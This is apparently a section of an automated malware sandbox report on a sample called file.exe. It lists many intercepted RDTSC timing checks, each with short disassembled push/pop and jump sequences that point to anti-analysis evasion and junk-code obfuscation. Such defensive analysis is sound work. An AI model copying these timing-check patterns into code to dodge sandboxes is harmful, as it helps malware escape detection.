                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7C9C second address: 11A7CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7DEC second address: 11A7DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7DF0 second address: 11A7DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7F6C second address: 11A7F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A8349 second address: 11A8380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB267F7h 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F020CB267F0h 0x00000011 popad 0x00000012 jo 00007F020CB26801h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD981 second address: 11AD987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD987 second address: 11AD994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 je 00007F020CB267E8h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD994 second address: 11AD99A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD99A second address: 11AD9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F020CB267EBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 ja 00007F020CB267E6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD9B8 second address: 11AD9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB1A second address: 11ADB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F020CB267E6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB26 second address: 11ADB37 instructions: 0x00000000 rdtsc 0x00000002 js 00007F020CB28446h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB37 second address: 11ADB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB267EEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B35B6 second address: 11B35BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B39C4 second address: 11B39C9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9FD1 second address: 11B9FE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F020CB28446h 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9FE1 second address: 11B9FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9FE9 second address: 11B9FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA3FB second address: 11BA403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA403 second address: 11BA409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA409 second address: 11BA411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA5A3 second address: 11BA5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F020CB28446h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA737 second address: 11BA744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F020CB267E6h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA744 second address: 11BA767 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F020CB28446h 0x00000008 jmp 00007F020CB28454h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD783 second address: 11BD789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD789 second address: 11BD795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD8CA second address: 11BD8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD8CF second address: 11BD8D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD8D5 second address: 11BD8D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BD8D9 second address: 11BD8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C458B second address: 11C458F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4B54 second address: 11C4B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4DE5 second address: 11C4DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4DEA second address: 11C4E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F020CB28454h 0x00000008 jmp 00007F020CB28454h 0x0000000d jl 00007F020CB28446h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007F020CB28457h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4E3A second address: 11C4E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F020CB267EFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4E4F second address: 11C4E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F020CB28450h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4E64 second address: 11C4E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4E6A second address: 11C4E6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CA9D8 second address: 11CA9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDAC5 second address: 11CDAE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB28457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDE9B second address: 11CDEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE267 second address: 11CE26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D72B2 second address: 11D72B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D72B8 second address: 11D72BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D72BC second address: 11D72C6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F020CB267E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D72C6 second address: 11D72D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB2844Fh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D72D9 second address: 11D72DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D58F6 second address: 11D5905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5905 second address: 11D590F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F020CB267E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5FB0 second address: 11D5FE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F020CB28455h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F020CB2844Ch 0x00000011 ja 00007F020CB28446h 0x00000017 pop ebx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F020CB2844Ch 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5FE9 second address: 11D5FEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6A22 second address: 11D6A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D6A2D second address: 11D6A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEDD7 second address: 11DEE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F020CB28446h 0x0000000a jmp 00007F020CB2844Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F020CB28457h 0x00000017 js 00007F020CB28446h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEE0F second address: 11DEE25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267ECh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEE25 second address: 11DEE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEE2B second address: 11DEE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEE2F second address: 11DEE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F020CB28455h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 je 00007F020CB28446h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EEC61 second address: 11EEC78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267F2h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE83B second address: 11EE842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE842 second address: 11EE84D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F02A9 second address: 11F02B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ecx 0x00000006 jnl 00007F020CB28446h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F02B7 second address: 11F02E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F020CB26801h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F35D2 second address: 11F35D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F35D6 second address: 11F35DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F35DC second address: 11F35EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F35EB second address: 11F3605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F020CB267F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F3605 second address: 11F360B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F360B second address: 11F361A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jg 00007F020CB267E6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F361A second address: 11F3633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F020CB28446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD737 second address: 11FD741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD741 second address: 11FD749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201E1E second address: 1201E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F020CB267EFh 0x0000000d jns 00007F020CB267E6h 0x00000013 pop edx 0x00000014 popad 0x00000015 jnc 00007F020CB267FCh 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007F020CB267E6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201E4D second address: 1201E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112541F second address: 1125423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201CC0 second address: 1201CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12097B7 second address: 12097BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111649E second address: 11164A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CFC5 second address: 120CFD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F020CB267ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CFD5 second address: 120CFDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1223F8D second address: 1223FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnc 00007F020CB267E6h 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1225725 second address: 1225730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F020CB28446h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12331BC second address: 12331C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12331C0 second address: 12331C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12331C9 second address: 12331D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F020CB267E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12331D5 second address: 12331DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12331DA second address: 12331F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F020CB267EFh 0x00000009 jl 00007F020CB267E6h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1235F11 second address: 1235F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F16C second address: 124F170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F170 second address: 124F176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F176 second address: 124F18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F020CB267EEh 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F020CB267E6h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F18A second address: 124F1B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F020CB28458h 0x00000008 jng 00007F020CB28446h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F1B6 second address: 124F1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F1BA second address: 124F1D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F020CB2844Eh 0x0000000d jl 00007F020CB28446h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F1D6 second address: 124F1DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124F1DA second address: 124F1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124DF45 second address: 124DF4F instructions: 0x00000000 rdtsc 0x00000002 je 00007F020CB267ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E39E second address: 124E3B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F020CB2844Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E3B4 second address: 124E3D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F020CB267EDh 0x0000000e jg 00007F020CB267E6h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E3D0 second address: 124E3D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124E540 second address: 124E548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
